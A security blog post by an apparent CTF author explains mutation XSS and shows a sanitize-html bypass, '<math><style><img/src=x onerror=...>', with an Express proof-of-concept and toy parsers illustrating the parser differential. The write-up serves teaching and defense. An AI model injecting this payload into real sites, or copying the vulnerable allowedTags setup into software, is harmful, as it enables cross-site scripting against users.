0xhexr4 :)

HTML Sanitizer Bypass Using mXSS

A couple of months ago, I was building a CTF challenge and needed one more bug. To increase the difficulty of the challenge, I started looking for HTML sanitizer bypasses. During that research, I learned about Mutation XSS (mXSS), a class of XSS that can be used to bypass HTML sanitizers.

Quick Introduction to Mutation XSS

When a browser renders broken markup, instead of crashing or displaying an error message, it tries to interpret and fix the HTML as best it can, even if the markup contains syntax errors or missing elements. For instance, opening the following markup in the browser

<p>test

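renders as expected despite the missing closing `</p>` tag. Looking at the final page's HTML, we can see that the parser fixed our broken markup and closed the `<p>` element by itself:

<p>test</p>

Mutation XSS abuses exactly this behavior: if a sanitizer parses markup differently from the browser, input that looks harmless to the sanitizer can be "fixed" by the browser into markup that runs JavaScript.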
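To make the fix-up step concrete, here is a deliberately tiny sketch of it. The `autoClose` helper is hypothetical: it only appends closing tags for elements still open at the end of the input, and it assumes simple tags without void elements, comments or raw-text content. Real browsers run the much larger HTML5 tree-construction algorithm instead.

```javascript
// Toy sketch of browser-style error recovery: any element still open at the
// end of the input gets a closing tag appended. Assumption: only simple tags
// such as <p> or <b>; NOT the real HTML5 tree-construction algorithm.
function autoClose(markup) {
  const tagRe = /<(\/?)([a-z][a-z0-9]*)[^>]*>/gi;
  const stack = []; // names of currently open elements
  let m;
  while ((m = tagRe.exec(markup)) !== null) {
    const name = m[2].toLowerCase();
    if (m[1]) {
      // End tag: close the nearest open element with this name
      // (and, implicitly, anything opened inside it).
      const idx = stack.lastIndexOf(name);
      if (idx !== -1) stack.length = idx;
    } else {
      stack.push(name);
    }
  }
  // Append closing tags for whatever is still open, innermost first.
  return markup + stack.reverse().map((name) => `</${name}>`).join("");
}

console.log(autoClose("<p>test")); // <p>test</p>
```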

sanitize-html Bypass

While reading the documentation of the "sanitize-html" library, I noticed that it is built on "htmlparser2", a parser that does not strictly follow the HTML specification.

After trying a bunch of payloads, I came up with the following proof of concept (PoC):

const express = require("express");
const bodyParser = require("body-parser");
const sanitizeHtml = require("sanitize-html");

const app = express();

app.use(bodyParser.urlencoded({ extended: true }));

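app.get("/", (req, res) => {
    // Hardcoded payload for the PoC; in a real app this would be user input.
    const userInput = `<math><style><img/src=x onerror="alert(1)"`;
    // Allow <math> and <style> on top of the default allow-list.
    // Allowing "style" is what makes this bypass possible.
    const sanitizedInput = sanitizeHtml(userInput, {
        allowedTags: sanitizeHtml.defaults.allowedTags.concat(["math", "style"]),
    });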

    res.send(`
    <!DOCTYPE html>
    <html lang="en">
        <head>
            <meta charset="UTF-8">
            <meta name="viewport" content="width=device-width, initial-scale=1.0">
            <title>Sanitized Output</title>
        </head>
        <body>
            <h1>Sanitized Output</h1>
            <p>${sanitizedInput}</p>
            <a href="/">Back to form</a>
        </body>
    </html>
    `);
});

const PORT = process.env.PORT || 1337;
app.listen(PORT, () => {
    console.log(`Server is running on http://localhost:${PORT}`);
});

I believe the library's maintainers are aware of this issue: if you add `style` to `allowedTags`, you get the following warning:

Server is running on http://localhost:1337

⚠️ Your `allowedTags` option includes `style`,
which is inherently vulnerable to XSS attacks.
Please remove it from `allowedTags`. Or, to
disable this warning, add the `allowVulnerableTags`
option and ensure you are accounting for this risk.

<math><style><img/src=x onerror="alert(1)"

This payload is not sanitized because htmlparser2 treats everything inside a <style> element as raw text, so it never sees an <img> tag at all. The browser, however, parses the same markup according to the HTML5 specification, which produces the following DOM (simplified):

    <math><style></style></math>
    <img src="x" onerror="alert(1)">

The key is the <math> element. Once the browser's parser enters <math>, it is in "foreign content" (MathML) mode, where <style> is just an ordinary MathML element rather than a raw-text HTML element, so its content is tokenized as markup. The parser then meets <img>, which is one of the HTML start tags that break out of foreign content: it closes the open <style> and <math> elements and inserts <img> as a regular HTML element, complete with its onerror handler.

That's how this bypass works: htmlparser2 never looks inside <style> because it always treats its content as raw text, even when the element sits inside <math>, while the browser does not.
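The differential can be illustrated with a small toy model. The hypothetical `elementPaths` function below is not a real HTML parser: it finds tags with a regex and models only a few rules. With `namespaceAware` set to false, an HTML <style> is always raw text (the htmlparser2 behavior described above). With it set to true, <style> inside <math> is an ordinary MathML element, and a few HTML tags such as <img> break out of MathML content; the `BREAKOUT` set is only a subset of the list in the HTML specification. The input is a simplified, well-formed variant of the payload, not the exact string sanitize-html emits.

```javascript
// Toy model of the parser differential behind this bypass. NOT a real HTML
// parser: tags are found with a regex, attributes are ignored, and only the
// rules that matter for <math>, <style> and <img> are modelled.

// A subset of the HTML tags that "break out" of MathML foreign content.
const BREAKOUT = new Set(["b", "br", "div", "i", "img", "p", "table"]);
// Void elements are never pushed onto the stack of open elements.
const VOID = new Set(["br", "img"]);

// Returns the path of every element the parser creates, e.g. "math>style".
// namespaceAware = false: <style> is always raw text (htmlparser2-like view).
// namespaceAware = true: a rough approximation of the HTML5 rules.
function elementPaths(markup, namespaceAware) {
  const tagRe = /<(\/?)([a-z][a-z0-9]*)[^>]*>/gi;
  const stack = []; // open elements: { name, ns }
  const paths = [];
  let m;
  while ((m = tagRe.exec(markup)) !== null) {
    const name = m[2].toLowerCase();
    if (m[1]) {
      // End tag: close the nearest open element with this name, if any.
      const idx = stack.map((e) => e.name).lastIndexOf(name);
      if (idx !== -1) stack.length = idx;
      continue;
    }
    const top = stack[stack.length - 1];
    if (namespaceAware && top && top.ns === "mathml" && BREAKOUT.has(name)) {
      // Breakout: pop MathML elements until an HTML element is current.
      while (stack.length > 0 && stack[stack.length - 1].ns === "mathml") {
        stack.pop();
      }
    }
    const parent = stack[stack.length - 1];
    const ns =
      namespaceAware && (name === "math" || (parent && parent.ns === "mathml"))
        ? "mathml"
        : "html";
    paths.push([...stack.map((e) => e.name), name].join(">"));
    if (!VOID.has(name)) stack.push({ name, ns });
    if (ns === "html" && name === "style") {
      // Raw text: skip everything up to the next </style (or end of input).
      const closeRe = /<\/style/gi;
      closeRe.lastIndex = tagRe.lastIndex;
      const close = closeRe.exec(markup);
      tagRe.lastIndex = close ? close.index : markup.length;
    }
  }
  return paths;
}

// Simplified, well-formed variant of the payload (assumption).
const payload = '<math><style><img src=x onerror="alert(1)"></style></math>';
console.log(elementPaths(payload, false)); // [ 'math', 'math>style' ]
console.log(elementPaths(payload, true)); // [ 'math', 'math>style', 'img' ]
```

In the raw-text view no `img` element is ever created, so there is nothing for the sanitizer to strip; with the browser-like rules, `img` appears as a top-level element outside <math>.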

At the time of writing, the latest version (v2.13.1) still has this issue, and I don't think it will be patched unless the library replaces htmlparser2. This issue is showcased in the Intergalactic Bounty web challenge from University CTF 2024. Thanks a lot for reading! :)